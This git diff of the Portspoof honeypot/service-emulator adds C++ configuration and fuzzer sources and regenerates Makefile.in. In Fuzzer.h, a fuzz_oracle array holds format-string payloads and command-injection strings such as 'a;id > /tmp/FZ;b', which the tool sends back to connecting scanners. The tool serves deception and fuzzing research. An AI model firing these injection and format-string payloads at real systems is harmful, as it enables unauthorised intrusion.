fprintf(stdout,"Error in configuration file"); + exit(1); + } + + //DEBUG + //fprintf(stdout,"range port %d-%d value: %s\n",lp,hp,Utils::get_substring_value(tmp)); + + for(int i=lp;i<=hp;i++) + portsignatureemap[i]=process_signature(std::string(Utils::get_substring_value(tmp))); + + continue; + + } + + } + + fclose(fp); + + + return 0; + +} + diff --git a/src/Configuration.h b/src/Configuration.h new file mode 100755 index 0000000..b3af614 --- /dev/null +++ b/src/Configuration.h @@ -0,0 +1,147 @@ +/* + * Portspoof - Service Signature Emulator / Exploitation Framework Frontend + * Copyright (C) 2012 Piotr Duszyński + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation; either version 2 of the License, or (at your + * option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program; if not, see . + * + * Linking portspoof statically or dynamically with other modules is making + * a combined work based on Portspoof. Thus, the terms and conditions of + * the GNU General Public License cover the whole combination. + * + * In addition, as a special exception, the copyright holder of Portspoof + * gives you permission to combine Portspoof with free software programs or + * libraries that are released under the GNU LGPL. You may copy + * and distribute such a system following the terms of the GNU GPL for + * Portspoof and the licenses of the other code concerned. + * + * Note that people who make modified versions of Portspoof are not obligated + * to grant this special exception for their modified versions; it is their + * choice whether to do so. The GNU General Public License gives permission + * to release a modified version without this exception; this exception + * also makes it possible to release a modified version which carries + * forward this exception. + */ + + + +#ifndef CONFIG_H +#define CONFIG_H + +#define CONFSEPARATOR "/" +#define DEFAULT_PORT 4444 + +#define LOG_FILE "portspoof.log" +#define CONF_FILE "portspoof.conf" +#define SIGNATURE_FILE "portspoof_signatures" + +#define DAEMON_USER "daemon" +#define DAEMON_GROUP "daemon" + +#define OPT_FUZZ_WORDLIST 1 +#define OPT_IP 2 +#define OPT_PORT 3 +#define OPT_DEBUG 4 +#define OPT_SIG_FILE 5 +#define OPT_LOG_FILE 6 +#define OPT_SYSLOG_DIS 7 +#define OPT_CONFIG_FILE 8 +#define OPT_FUZZ_NMAP 9 +#define OPT_FUZZ_INTERNAL 10 +#define OPT_NOT_NMAP_SCANNER 11 +#define OPT_FUZZ_RANDOM 12 +#define OPT_RUN_AS_D 13 + + +#define MAX_PORTS 65535 + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +#include "Utils.h" +#include "Threads.h" + + +#include "revregex.h" +#include "connection.h" + +using namespace std; + + +typedef map < unsigned short, std::vector > Port_Signature_Map; +typedef vector < string > Raw_Signatures_Vector; +typedef vector < string > Nmap_Fuzz_Vector; +class Fuzzer; + +#include "Fuzzer.h" + + +class Configuration { + private: + std::string configfile; + std::string signaturefile; + std::string logfile; + std::string bind_ip; + std::string username; + std::string group; + + unsigned short int port; + int thread_number; + bool fuzzing_mode; + bitset<20> opts; + Fuzzer* fuzzer; + std::string nmapfuzzsignatures_file; + std::string fuzzpayload_file; + Port_Signature_Map portsignatureemap; + Raw_Signatures_Vector rawsignatures; + + + public: + Configuration(); + void usage(void); + bool processArgs(int argc, char** argv); + bool readConfigFile(); + std::vector mapPort2Signature(unsigned short port); + bool processSignatureFile(); + + //getters + std::string getConfigFile(); + std::string getSignatureFile(); + std::string getLogFile(); + std::string getBindIP(); + std::string getNmapfuzzSignaturesFile(); + std::string getFuzzPayloadFile(); + bool getConfigValue(int value); + unsigned short int getPort(); + int getThreadNr(); + int getGroupid(); + int getUserid(); +}; + + +#endif diff --git a/src/Fuzzer.cpp b/src/Fuzzer.cpp new file mode 100755 index 0000000..8e55f2e --- /dev/null +++ b/src/Fuzzer.cpp @@ -0,0 +1,203 @@ +/* + * Portspoof - Service Signature Emulator / Exploitation Framework Frontend + * Copyright (C) 2012 Piotr Duszyński + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation; either version 2 of the License, or (at your + * option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program; if not, see . + * + * Linking portspoof statically or dynamically with other modules is making + * a combined work based on Portspoof. Thus, the terms and conditions of + * the GNU General Public License cover the whole combination. + * + * In addition, as a special exception, the copyright holder of Portspoof + * gives you permission to combine Portspoof with free software programs or + * libraries that are released under the GNU LGPL. You may copy + * and distribute such a system following the terms of the GNU GPL for + * Portspoof and the licenses of the other code concerned. + * + * Note that people who make modified versions of Portspoof are not obligated + * to grant this special exception for their modified versions; it is their + * choice whether to do so. The GNU General Public License gives permission + * to release a modified version without this exception; this exception + * also makes it possible to release a modified version which carries + * forward this exception. + */ + + + +#include "Fuzzer.h" + +Fuzzer::Fuzzer() +{ + + + return; +} + +Fuzzer::Fuzzer(Configuration* configuration) +{ + + this->configuration = configuration; + this->nmapfuzzsignatures_file = configuration->getNmapfuzzSignaturesFile(); + this->fuzzpayload_file = configuration->getFuzzPayloadFile(); + this->counter=0; + this->payload_counter=0; + this->PrepareFuzzer(); + + return; +} + + +bool Fuzzer::PrepareFuzzer() +{ + + if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST)) + { + + this->fp_payloads=fopen(this->fuzzpayload_file.c_str(), "r"); + if ( this->fp_payloads == NULL) { + fprintf(stdout,"Error opening payload file: %s \n",this->fuzzpayload_file.c_str()); + return 1; + } + + } + ///// + + if(this->configuration->getConfigValue(OPT_FUZZ_NMAP)) + { + + FILE *fp = fopen(this->nmapfuzzsignatures_file.c_str(), "r"); + if (fp == NULL) { + fprintf(stdout,"Error opening nmap signature file: %s \n",this->nmapfuzzsignatures_file.c_str()); + return 1; + } + + char buf_file[BUFSIZE]; + while (fgets(buf_file, BUFSIZE, fp)) + nmapfuzzsignatures.push_back(std::string(buf_file)); + fclose(fp); + fprintf(stdout,"-> Nmap signatures read: %d \n",this->nmapfuzzsignatures.size()); + + } + + return 0; + +} + +std::vector Fuzzer::intToBytes(int paramInt) +{ + vector arrayOfByte(4); + for (int i = 0; i < 4; i++) + arrayOfByte[3 - i] = (paramInt >> (i * 8)); + return arrayOfByte; +} + + +std::vector Fuzzer::shortToBytes(unsigned short paramInt) +{ + vector arrayOfByte(2); + for (int i = 0; i < 2; i++) + arrayOfByte[1 - i] = (paramInt >> (i * 4)); + return arrayOfByte; +} + +std::vector Fuzzer::GenerateFuzzPayload() +{ + std::vector result_vector; + std::string str; + + + if(this->configuration->getConfigValue(OPT_FUZZ_RANDOM)) + { + + for(int i=0;i<255;i++) + result_vector.push_back(i); + return result_vector; + + } + + + if(this->payload_counter<10) + { + for(int i=0;i<4000*(this->payload_counter+1);i++) + result_vector.push_back(*(fuzz_oracle[0])); + } + else + { + + str=std::string(fuzz_oracle[this->payload_counter-9]); + result_vector=Utils::str2vector(str); + } + + this->payload_counter++; + + if(this->payload_counter>=25) + this->payload_counter=0; + + return result_vector; + +} + +std::vector Fuzzer::GetFUZZ() +{ + std::vector result_vector; + + if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST)) + { + + + if(this->counter%this->nmapfuzzsignatures.size()==0) + { + + char buf_file[BUFSIZE]; + std::string str; + + if(fgets(buf_file, BUFSIZE, this->fp_payloads)==NULL) + { + fprintf(stdout,"EOF of payload file\n"); + fflush(stdout); + } + + str=std::string(buf_file); + str.erase(str.size() - 1);//remove \n + this->input_line=Utils::str2vector(str); + + } + + this->counter++; + + } + else if(this->configuration->getConfigValue(OPT_FUZZ_INTERNAL)) + { + result_vector=this->GenerateFuzzPayload(); + } + else + fprintf(stdout,"Fuzz - shouldn't be here...\n"); + + + if(this->configuration->getConfigValue(OPT_FUZZ_NMAP)) + { + + if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST)) + result_vector=Utils::wrapNMAP(this->nmapfuzzsignatures[this->counter%this->nmapfuzzsignatures.size()],this->input_line); + else if(this->configuration->getConfigValue(OPT_FUZZ_INTERNAL)) + result_vector=Utils::wrapNMAP(this->nmapfuzzsignatures[this->counter%this->nmapfuzzsignatures.size()],result_vector); + + result_vector=Utils::unescape(result_vector); + + } + + return result_vector; + + +} diff --git a/src/Fuzzer.h b/src/Fuzzer.h new file mode 100755 index 0000000..5d59d1e --- /dev/null +++ b/src/Fuzzer.h @@ -0,0 +1,114 @@ +/* + * Portspoof - Service Signature Emulator / Exploitation Framework Frontend + * Copyright (C) 2012 Piotr Duszyński + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation; either version 2 of the License, or (at your + * option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program; if not, see . + * + * Linking portspoof statically or dynamically with other modules is making + * a combined work based on Portspoof. Thus, the terms and conditions of + * the GNU General Public License cover the whole combination. + * + * In addition, as a special exception, the copyright holder of Portspoof + * gives you permission to combine Portspoof with free software programs or + * libraries that are released under the GNU LGPL. You may copy + * and distribute such a system following the terms of the GNU GPL for + * Portspoof and the licenses of the other code concerned. + * + * Note that people who make modified versions of Portspoof are not obligated + * to grant this special exception for their modified versions; it is their + * choice whether to do so. The GNU General Public License gives permission + * to release a modified version without this exception; this exception + * also makes it possible to release a modified version which carries + * forward this exception. + */ + + + + +#ifndef FUZZER_H +#define FUZZER_H + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "Utils.h" +#include "Configuration.h" + +using namespace std; + +#define NMAP_FUZZ_FILE_SIG "nmapfuzzsignatures" +#define FUZZ_FILE_PAYLOAD "nmapfuzzpayloads" + + static const char* const fuzz_oracle[]= +{ +"A", +"%n%n%n%n%n", +"%%20n", +"%n%p%s%d%x", +"%.1024d", +"%.2049d", +"-1", +"32767", +"65535", +"-2147483647", +"0xffffffff", +"a|id > /tmp/FZ|b", +"a`id > /tmp/FZ`b", +"a'id > /tmp/FZ'b", +"a;id > /tmp/FZ;b", +"a&&id > /tmp/FZ&&b" +}; + + +class Fuzzer{ + private: + + std::string nmapfuzzsignatures_file; + std::string fuzzpayload_file; + Nmap_Fuzz_Vector nmapfuzzsignatures; + FILE *fp_payloads; + std::vector input_line; + Configuration* configuration; + int counter; + int payload_counter; + int nmapfuzzsignatures_size; + + public: + Fuzzer(); + Fuzzer(Configuration* configuration); + bool processSignatureFile(); + std::vector GetFUZZ(); + std::vector GenerateFuzzPayload(); + std::vector intToBytes(int paramInt); + std::vector shortToBytes(unsigned short paramInt); + + bool PrepareFuzzer(); +}; + + +#endif diff --git a/src/Makefile.am b/src/Makefile.am old mode 100644 new mode 100755 index 481a9c3..685355a --- a/src/Makefile.am +++ b/src/Makefile.am @@ -1,8 +1,8 @@ ## Process this file with automake to produce Makefile.in # File lists -headers = connection.h portspoof.h revregex.h threads.h log.h config_file.h -sources = connection.c portspoof.c revregex.c log.c config_file.c +headers = config.h Configuration.h connection.h Fuzzer.h Server.h revregex.h Threads.h Utils.h +sources = Configuration.cpp connection.cpp Fuzzer.cpp Portspoof.cpp Server.cpp revregex.cpp Utils.cpp # Unix executables bin_PROGRAMS = portspoof diff --git a/src/Makefile.in b/src/Makefile.in index 236881e..db9c879 100644 --- a/src/Makefile.in +++ b/src/Makefile.in @@ -1,8 +1,9 @@ -# Makefile.in generated by automake 1.10 from Makefile.am. +# Makefile.in generated by automake 1.11.1 from Makefile.am. # @configure_input@ # Copyright (C) 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002, -# 2003, 2004, 2005, 2006 Free Software Foundation, Inc. +# 2003, 2004, 2005, 2006, 2007, 2008, 2009 Free Software Foundation, +# Inc. # This Makefile.in is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. @@ -16,8 +17,9 @@ VPATH = @srcdir@ pkgdatadir = $(datadir)/@PACKAGE@ -pkglibdir = $(libdir)/@PACKAGE@ pkgincludedir = $(includedir)/@PACKAGE@ +pkglibdir = $(libdir)/@PACKAGE@ +pkglibexecdir = $(libexecdir)/@PACKAGE@ am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd install_sh_DATA = $(install_sh) -c -m 644 install_sh_PROGRAM = $(install_sh) -c @@ -43,21 +45,28 @@ am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \ mkinstalldirs = $(install_sh) -d CONFIG_HEADER = config.h CONFIG_CLEAN_FILES = +CONFIG_CLEAN_VPATH_FILES = am__installdirs = "$(DESTDIR)$(bindir)" -binPROGRAMS_INSTALL = $(INSTALL_PROGRAM) PROGRAMS = $(bin_PROGRAMS) am__objects_1 = -am__objects_2 = portspoof-connection.$(OBJEXT) \ - portspoof-portspoof.$(OBJEXT) portspoof-revregex.$(OBJEXT) \ - portspoof-log.$(OBJEXT) portspoof-config_file.$(OBJEXT) +am__objects_2 = portspoof-Configuration.$(OBJEXT) \ + portspoof-connection.$(OBJEXT) portspoof-Fuzzer.$(OBJEXT) \ + portspoof-Portspoof.$(OBJEXT) portspoof-Server.$(OBJEXT) \ + portspoof-revregex.$(OBJEXT) portspoof-Utils.$(OBJEXT) am_portspoof_OBJECTS = $(am__objects_1) $(am__objects_2) portspoof_OBJECTS = $(am_portspoof_OBJECTS) portspoof_LDADD = $(LDADD) -portspoof_LINK = $(CCLD) $(AM_CFLAGS) $(CFLAGS) $(portspoof_LDFLAGS) \ - $(LDFLAGS) -o $@ +portspoof_LINK = $(CXXLD) $(AM_CXXFLAGS) $(CXXFLAGS) \ + $(portspoof_LDFLAGS) $(LDFLAGS) -o $@ DEFAULT_INCLUDES = -I.@am__isrc@ depcomp = $(SHELL) $(top_srcdir)/auto/depcomp am__depfiles_maybe = depfiles +am__mv = mv -f +CXXCOMPILE = $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) \ + $(AM_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) +CXXLD = $(CXX) +CXXLINK = $(CXXLD) $(AM_CXXFLAGS) $(CXXFLAGS) $(AM_LDFLAGS) $(LDFLAGS) \ + -o $@ COMPILE = $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) \ $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) CCLD = $(CC) @@ -78,6 +87,9 @@ CCDEPMODE = @CCDEPMODE@ CFLAGS = @CFLAGS@ CPP = @CPP@ CPPFLAGS = @CPPFLAGS@ +CXX = @CXX@ +CXXDEPMODE = @CXXDEPMODE@ +CXXFLAGS = @CXXFLAGS@ CYGPATH_W = @CYGPATH_W@ DEFS = @DEFS@ DEPDIR = @DEPDIR@ @@ -104,6 +116,7 @@ PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@ PACKAGE_NAME = @PACKAGE_NAME@ PACKAGE_STRING = @PACKAGE_STRING@ PACKAGE_TARNAME = @PACKAGE_TARNAME@ +PACKAGE_URL = @PACKAGE_URL@ PACKAGE_VERSION = @PACKAGE_VERSION@ PATH_SEPARATOR = @PATH_SEPARATOR@ SET_MAKE = @SET_MAKE@ @@ -115,6 +128,7 @@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ abs_top_srcdir = @abs_top_srcdir@ ac_ct_CC = @ac_ct_CC@ +ac_ct_CXX = @ac_ct_CXX@ am__include = @am__include@ am__leading_dot = @am__leading_dot@ am__quote = @am__quote@ @@ -157,12 +171,13 @@ sharedstatedir = @sharedstatedir@ srcdir = @srcdir@ sysconfdir = @sysconfdir@ target_alias = @target_alias@ +top_build_prefix = @top_build_prefix@ top_builddir = @top_builddir@ top_srcdir = @top_srcdir@ # File lists -headers = connection.h portspoof.h revregex.h threads.h log.h config_file.h -sources = connection.c portspoof.c revregex.c log.c config_file.c +headers = config.h Configuration.h connection.h Fuzzer.h Server.h revregex.h Threads.h Utils.h +sources = Configuration.cpp connection.cpp Fuzzer.cpp Portspoof.cpp Server.cpp revregex.cpp Utils.cpp portspoof_SOURCES = $(headers) $(sources) # Threads @@ -174,19 +189,19 @@ all: config.h $(MAKE) $(AM_MAKEFLAGS) all-am .SUFFIXES: -.SUFFIXES: .c .o .obj +.SUFFIXES: .cpp .o .obj $(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps) @for dep in $?; do \ case '$(am__configure_deps)' in \ *$$dep*) \ - cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh \ - && exit 0; \ + ( cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh ) \ + && { if test -f $@; then exit 0; else break; fi; }; \ exit 1;; \ esac; \ done; \ - echo ' cd $(top_srcdir) && $(AUTOMAKE) --gnu src/Makefile'; \ - cd $(top_srcdir) && \ - $(AUTOMAKE) --gnu src/Makefile + echo ' cd $(top_srcdir) && $(AUTOMAKE) --gnu src/Makefile'; \ + $(am__cd) $(top_srcdir) && \ + $(AUTOMAKE) --gnu src/Makefile .PRECIOUS: Makefile Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status @case '$?' in \ @@ -204,6 +219,7 @@ $(top_srcdir)/configure: $(am__configure_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(ACLOCAL_M4): $(am__aclocal_m4_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh +$(am__aclocal_m4_deps): config.h: stamp-h1 @if test ! -f $@; then \ @@ -215,7 +231,7 @@ stamp-h1: $(srcdir)/config.h.in $(top_builddir)/config.status @rm -f stamp-h1 cd $(top_builddir) && $(SHELL) ./config.status src/config.h $(srcdir)/config.h.in: $(am__configure_deps) - cd $(top_srcdir) && $(AUTOHEADER) + ($(am__cd) $(top_srcdir) && $(AUTOHEADER)) rm -f stamp-h1 touch $@ @@ -224,23 +240,37 @@ distclean-hdr: install-binPROGRAMS: $(bin_PROGRAMS) @$(NORMAL_INSTALL) test -z "$(bindir)" || $(MKDIR_P) "$(DESTDIR)$(bindir)" - @list='$(bin_PROGRAMS)'; for p in $$list; do \ - p1=`echo $$p|sed 's/$(EXEEXT)$$//'`; \ - if test -f $$p \ - ; then \ - f=`echo "$$p1" | sed 's,^.*/,,;$(transform);s/$$/$(EXEEXT)/'`; \ - echo " $(INSTALL_PROGRAM_ENV) $(binPROGRAMS_INSTALL) '$$p' '$(DESTDIR)$(bindir)/$$f'"; \ - $(INSTALL_PROGRAM_ENV) $(binPROGRAMS_INSTALL) "$$p" "$(DESTDIR)$(bindir)/$$f" || exit 1; \ - else :; fi; \ - done + @list='$(bin_PROGRAMS)'; test -n "$(bindir)" || list=; \ + for p in $$list; do echo "$$p $$p"; done | \ + sed 's/$(EXEEXT)$$//' | \ + while read p p1; do if test -f $$p; \ + then echo "$$p"; echo "$$p"; else :; fi; \ + done | \ + sed -e 'p;s,.*/,,;n;h' -e 's|.*|.|' \ + -e 'p;x;s,.*/,,;s/$(EXEEXT)$$//;$(transform);s/$$/$(EXEEXT)/' | \ + sed 'N;N;N;s,\n, ,g' | \ + $(AWK) 'BEGIN { files["."] = ""; dirs["."] = 1 } \ + { d=$$3; if (dirs[d] != 1) { print "d", d; dirs[d] = 1 } \ + if ($$2 == $$4) files[d] = files[d] " " $$1; \ + else { print "f", $$3 "/" $$4, $$1; } } \ + END { for (d in files) print "f", d, files[d] }' | \ + while read type dir files; do \ + if test "$$dir" = .; then dir=; else dir=/$$dir; fi; \ + test -z "$$files" || { \ + echo " $(INSTALL_PROGRAM_ENV) $(INSTALL_PROGRAM) $$files '$(DESTDIR)$(bindir)$$dir'"; \ + $(INSTALL_PROGRAM_ENV) $(INSTALL_PROGRAM) $$files "$(DESTDIR)$(bindir)$$dir" || exit $$?; \ + } \ + ; done uninstall-binPROGRAMS: @$(NORMAL_UNINSTALL) - @list='$(bin_PROGRAMS)'; for p in $$list; do \ - f=`echo "$$p" | sed 's,^.*/,,;s/$(EXEEXT)$$//;$(transform);s/$$/$(EXEEXT)/'`; \ - echo " rm -f '$(DESTDIR)$(bindir)/$$f'"; \ - rm -f "$(DESTDIR)$(bindir)/$$f"; \ - done + @list='$(bin_PROGRAMS)'; test -n "$(bindir)" || list=; \ + files=`for p in $$list; do echo "$$p"; done | \ + sed -e 'h;s,^.*/,,;s/$(EXEEXT)$$//;$(transform)' \ + -e 's/$$/$(EXEEXT)/' `; \ + test -n "$$list" || exit 0; \ + echo " ( cd '$(DESTDIR)$(bindir)' && rm -f" $$files ")"; \ + cd "$(DESTDIR)$(bindir)" && rm -f $$files clean-binPROGRAMS: -test -z "$(bin_PROGRAMS)" || rm -f $(bin_PROGRAMS) @@ -254,140 +284,174 @@ mostlyclean-compile: distclean-compile: -rm -f *.tab.c -@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-config_file.Po@am__quote@ +@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-Configuration.Po@am__quote@ +@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-Fuzzer.Po@am__quote@ +@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-Portspoof.Po@am__quote@ +@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-Server.Po@am__quote@ +@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-Utils.Po@am__quote@ @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-connection.Po@am__quote@ -@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-log.Po@am__quote@ -@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-portspoof.Po@am__quote@ @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-revregex.Po@am__quote@ -.c.o: -@am__fastdepCC_TRUE@ $(COMPILE) -MT $@ -MD -MP -MF $(DEPDIR)/$*.Tpo -c -o $@ $< -@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/$*.Tpo $(DEPDIR)/$*.Po -@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ -@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ -@am__fastdepCC_FALSE@ $(COMPILE) -c $< +.cpp.o: +@am__fastdepCXX_TRUE@ $(CXXCOMPILE) -MT $@ -MD -MP -MF $(DEPDIR)/$*.Tpo -c -o $@ $< +@am__fastdepCXX_TRUE@ $(am__mv) $(DEPDIR)/$*.Tpo $(DEPDIR)/$*.Po +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ +@am__fastdepCXX_FALSE@ $(CXXCOMPILE) -c -o $@ $< -.c.obj: -@am__fastdepCC_TRUE@ $(COMPILE) -MT $@ -MD -MP -MF $(DEPDIR)/$*.Tpo -c -o $@ `$(CYGPATH_W) '$<'` -@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/$*.Tpo $(DEPDIR)/$*.Po -@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ -@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ -@am__fastdepCC_FALSE@ $(COMPILE) -c `$(CYGPATH_W) '$<'` +.cpp.obj: +@am__fastdepCXX_TRUE@ $(CXXCOMPILE) -MT $@ -MD -MP -MF $(DEPDIR)/$*.Tpo -c -o $@ `$(CYGPATH_W) '$<'` +@am__fastdepCXX_TRUE@ $(am__mv) $(DEPDIR)/$*.Tpo $(DEPDIR)/$*.Po +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ +@am__fastdepCXX_FALSE@ $(CXXCOMPILE) -c -o $@ `$(CYGPATH_W) '$<'` -portspoof-connection.o: connection.c -@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-connection.o -MD -MP -MF $(DEPDIR)/portspoof-connection.Tpo -c -o portspoof-connection.o `test -f 'connection.c' || echo '$(srcdir)/'`connection.c -@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-connection.Tpo $(DEPDIR)/portspoof-connection.Po -@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='connection.c' object='portspoof-connection.o' libtool=no @AMDEPBACKSLASH@ -@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ -@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-connection.o `test -f 'connection.c' || echo '$(srcdir)/'`connection.c +portspoof-Configuration.o: Configuration.cpp +@am__fastdepCXX_TRUE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT portspoof-Configuration.o -MD -MP -MF $(DEPDIR)/portspoof-Configuration.Tpo -c -o portspoof-Configuration.o `test -f 'Configuration.cpp' || echo '$(srcdir)/'`Configuration.cpp +@am__fastdepCXX_TRUE@ $(am__mv) $(DEPDIR)/portspoof-Configuration.Tpo $(DEPDIR)/portspoof-Configuration.Po +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ source='Configuration.cpp' object='portspoof-Configuration.o' libtool=no @AMDEPBACKSLASH@ +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ +@am__fastdepCXX_FALSE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o portspoof-Configuration.o `test -f 'Configuration.cpp' || echo '$(srcdir)/'`Configuration.cpp -portspoof-connection.obj: connection.c -@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-connection.obj -MD -MP -MF $(DEPDIR)/portspoof-connection.Tpo -c -o portspoof-connection.obj `if test -f 'connection.c'; then $(CYGPATH_W) 'connection.c'; else $(CYGPATH_W) '$(srcdir)/connection.c'; fi` -@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-connection.Tpo $(DEPDIR)/portspoof-connection.Po -@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='connection.c' object='portspoof-connection.obj' libtool=no @AMDEPBACKSLASH@ -@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ -@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-connection.obj `if test -f 'connection.c'; then $(CYGPATH_W) 'connection.c'; else $(CYGPATH_W) '$(srcdir)/connection.c'; fi` +portspoof-Configuration.obj: Configuration.cpp +@am__fastdepCXX_TRUE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT portspoof-Configuration.obj -MD -MP -MF $(DEPDIR)/portspoof-Configuration.Tpo -c -o portspoof-Configuration.obj `if test -f 'Configuration.cpp'; then $(CYGPATH_W) 'Configuration.cpp'; else $(CYGPATH_W) '$(srcdir)/Configuration.cpp'; fi` +@am__fastdepCXX_TRUE@ $(am__mv) $(DEPDIR)/portspoof-Configuration.Tpo $(DEPDIR)/portspoof-Configuration.Po +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ source='Configuration.cpp' object='portspoof-Configuration.obj' libtool=no @AMDEPBACKSLASH@ +@AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ +@am__fastdepCXX_FALSE@ $(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o portspoof-Configuration.obj `if test -f 'Configuration.cpp'; then $(CYGPATH_W) 'Configuration.cpp'; else $(CYGPATH_W) '$(srcdir)/Configuration.cpp'; fi` -portspoof-portspoof.o: portspoof.c -@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) 